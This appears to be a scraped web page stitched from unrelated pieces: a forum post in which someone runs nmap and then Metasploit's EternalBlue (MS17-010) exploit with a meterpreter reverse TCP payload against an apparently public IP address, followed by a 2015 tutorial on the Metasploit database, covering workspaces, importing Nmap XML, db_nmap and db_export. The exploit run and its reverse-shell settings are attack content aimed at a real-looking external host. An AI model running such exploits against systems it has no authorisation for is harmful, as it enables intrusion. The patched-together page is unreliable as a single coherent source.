445 Tcp Open Microsoft Ds Metasploit


MICROSOFT-DS. What is this? This is explained in Microsoft Knowledge Base article Q131641, and can be seen by using a port scanner to probe TCP port 139 (the 'nbsession' port) on an adapter.

Using the Metasploit Database. Johan Grotherus. August 28, 2015.

@busterb hi again, here is the information

I am using nmap to check vulnerability and information about the target

Host is up (0.29s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds

Host script results:
smb-os-discovery:
OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
Computer name: SECURITYV01
NetBIOS computer name: SECURITYV01\x00
Workgroup: WORKGROUP\x00
_ System time: 2017-06-15T20:35:03-05:00
smb-vuln-ms17-10:
VULNERABLE:
Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
State: VULNERABLE
IDs: CVE:CVE-2017-0143
Risk factor: HIGH
A critical remote code execution vulnerability exists in Microsoft SMBv1
servers (ms17-010).

Disclosure date: 2017-03-14
References:
https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
msf exploit(ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.0.106:4444
[*] 190.11.20.72:445 - Connecting to target for exploitation.
[-] 190.11.20.72:445 - RubySMB::Error::UnexpectedStatusCode: Error with login: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information.
[*] Exploit completed, but no session was created.
msf exploit(ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

Name                Current Setting  Required  Description
----                ---------------  --------  -----------
GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
GroomDelta          5                yes       The amount to increase the groom count by per try.
MaxExploitAttempts  3                yes       The number of times to retry the exploit.
ProcessName         explorer.exe     yes       Process to inject payload into.
RHOST               190.11.xx.xx     yes       The target address
RPORT               445              yes       The target port (TCP)
SMBDomain           .                no        (Optional) The Windows domain to use for authentication
SMBPass                              no        (Optional) The password for the specified username
SMBUser                              no        (Optional) The username to authenticate as
VerifyArch          true             yes       Check if remote architecture matches exploit Target.
VerifyTarget        true             yes       Check if remote OS matches exploit Target.

Payload options (windows/x64/meterpreter/reverse_tcp):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
LHOST     192.168.0.106    yes       The listen address
LPORT     4444             yes       The listen port

Exploit target:

Id Name

0 Windows 7 and Server 2008 R2 (x64) All Service Packs

thanks.

The Metasploit database is a good way of keeping track of the things you get your hands on during a penetration test. The database can hold things like hosts, services, usernames and passwords. One particularly useful feature of the Metasploit database is its integration with Nmap. You can run Nmap scans from within Metasploit and store the results directly in the database.

Let’s see how this works.

Step 1 is to make sure that PostgreSQL is running on your Kali Linux machine.

> service postgresql start

Step 2 is to verify that Metasploit has a connection to the database.

> msfconsole (to start the Metasploit console)
msf> db_status (to check the database connection)
It should come back as [*] postgresql connected to msf3

If the database is not connected, you need to initialize it first.

msf> exit
> msfdb init (this is for Kali Linux 2.0)

Then try step 2 again; it should work now.

The first thing to do is to create a new workspace. A workspace is simply a table in the database to store data in, but it helps you stay organized. You can think of workspaces as projects or clients. When you have a new client or project, create a new workspace.

The workspace command is what you use to manage workspaces. You can have several workspaces and easily switch between them.

msf> workspace

This gives you the workspace you’re currently using. You can create a new workspace using the -a flag and delete one with the -d flag. To switch between workspaces, enter workspace followed by the name of the workspace.

msf> workspace -a test (create a workspace named test)
msf> workspace -d test (delete workspace named test)
msf> workspace test (switch to the workspace test)
msf> workspace -r test test2 (rename workspace test to test2)

Now, it’s time to get some Nmap data into your database. You can do this in two ways: either by importing an Nmap scan or by issuing an Nmap scan from within the Metasploit console. To import data, you use the db_import command. The Nmap scan result file that you import must be in XML format.

msf> db_import /root/nmap_scan.xml (to import a previous Nmap scan result file)


msf > db_import /root/nmap_router_scan
[*] Importing 'Nmap XML' data
[*] Import: Parsing with 'Nokogiri v1.6.6.2'
[*] Importing host 192.168.1.1
[*] Successfully imported /root/nmap_router_scan
msf >

Now that we’ve imported data, let’s see what we got. First, we use the hosts command to list all the hosts we have in our database workspace.

msf > hosts

Hosts

address      mac                name            os_name  os_flavor  os_sp  purpose  info  comments
-------      ---                ----            -------  ---------  -----  -------  ----  --------
192.168.1.1  08:63:61:8e:8f:4e  homerouter.cpe  Unknown                    device

msf >

Second, we check which services we got listed from our imported Nmap scan:

msf > services

Services

host         port   proto  name              state     info
----         ----   -----  ----              -----     ----
192.168.1.1  22     tcp    ssh               open
192.168.1.1  23     tcp    telnet            filtered
192.168.1.1  53     tcp    domain            open
192.168.1.1  80     tcp    http              open
192.168.1.1  443    tcp    https             open
192.168.1.1  631    tcp    ipp               filtered
192.168.1.1  3000   tcp    ppp               open
192.168.1.1  8081   tcp    blackice-icecap   filtered

msf >

You can import many different kinds of data into the Metasploit database. Run the db_import command without arguments to get a complete list of the supported file types.

msf > db_import
Usage: db_import <filename> [file2...]

Filenames can be globs like *.xml, or **/*.xml, which will search recursively.

Currently supported file types include:

Acunetix
Amap Log
Amap Log -m
Appscan
Burp Session XML
CI
Foundstone
FusionVM XML
IP Address List
IP360 ASPL
IP360 XML v3
Libpcap Packet Capture
Metasploit PWDump Export
Metasploit XML
Metasploit Zip Export
Microsoft Baseline Security Analyzer
NeXpose Simple XML
NeXpose XML Report
Nessus NBE Report
Nessus XML (v1)
Nessus XML (v2)
NetSparker XML
Nikto XML
Nmap XML
OpenVAS Report
OpenVAS XML
Outpost24 XML
Qualys Asset XML
Qualys Scan XML
Retina XML
Spiceworks CSV Export
Wapiti XML

msf >

As you can see, there are a lot of options for importing data into Metasploit. Then, there’s the other possibility: executing an Nmap scan from within the Metasploit console. You use the db_nmap command to do this. Here’s an example from my home network:

msf > db_nmap 192.168.1.3
[*] Nmap: Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-08-27 20:33 CEST
[*] Nmap: Nmap scan report for 192.168.1.3
[*] Nmap: Host is up (0.0014s latency).
[*] Nmap: Not shown: 995 closed ports
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 139/tcp open netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds
[*] Nmap: 548/tcp open afp
[*] Nmap: 5009/tcp open airport-admin
[*] Nmap: 10000/tcp open snet-sensor-mgmt
[*] Nmap: MAC Address: 90:72:40:04:88:4B (Apple)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 91.73 seconds
msf >

Now, let’s check the hosts and services commands again:

msf > hosts

Hosts

address      mac                name            os_name  os_flavor  os_sp  purpose  info  comments
-------      ---                ----            -------  ---------  -----  -------  ----  --------
192.168.1.1  08:63:61:8e:8f:4e  homerouter.cpe  Unknown                    device
192.168.1.3  90:72:40:04:88:4b                  Unknown                    device

msf >

msf > services

Services

host         port   proto  name              state     info
----         ----   -----  ----              -----     ----
192.168.1.1  22     tcp    ssh               open
192.168.1.1  23     tcp    telnet            filtered
192.168.1.1  53     tcp    domain            open
192.168.1.1  80     tcp    http              open
192.168.1.1  8081   tcp    blackice-icecap   filtered
192.168.1.1  443    tcp    https             open
192.168.1.1  3000   tcp    ppp               open
192.168.1.1  631    tcp    ipp               filtered
192.168.1.3  445    tcp    microsoft-ds      open
192.168.1.3  548    tcp    afp               open
192.168.1.3  5009   tcp    airport-admin     open
192.168.1.3  139    tcp    netbios-ssn       open
192.168.1.3  10000  tcp    snet-sensor-mgmt  open

msf >

As you scan additional hosts or networks, your database will hold more and more information about your target. So, as a last step in this tutorial, I’ll mention the db_export command, which allows you to make a backup. The db_export command allows for saving your workspace as an XML file or as a pwdump file. The pwdump format is for credentials only; XML format saves everything.


msf > db_export -f xml /root/test_workspace.xml
[*] Starting export of workspace test to /root/test_workspace.xml [ xml ]…
[*] >> Starting export of report
[*] >> Starting export of hosts
[*] >> Starting export of events
[*] >> Starting export of services
[*] >> Starting export of web sites
[*] >> Starting export of web pages
[*] >> Starting export of web forms
[*] >> Starting export of web vulns
[*] >> Starting export of module details
[*] >> Finished export of report
[*] Finished export of workspace test to /root/test_workspace.xml [ xml ]…
msf >


In my next tutorial I will show more features of the Metasploit database and how you can use them to your advantage.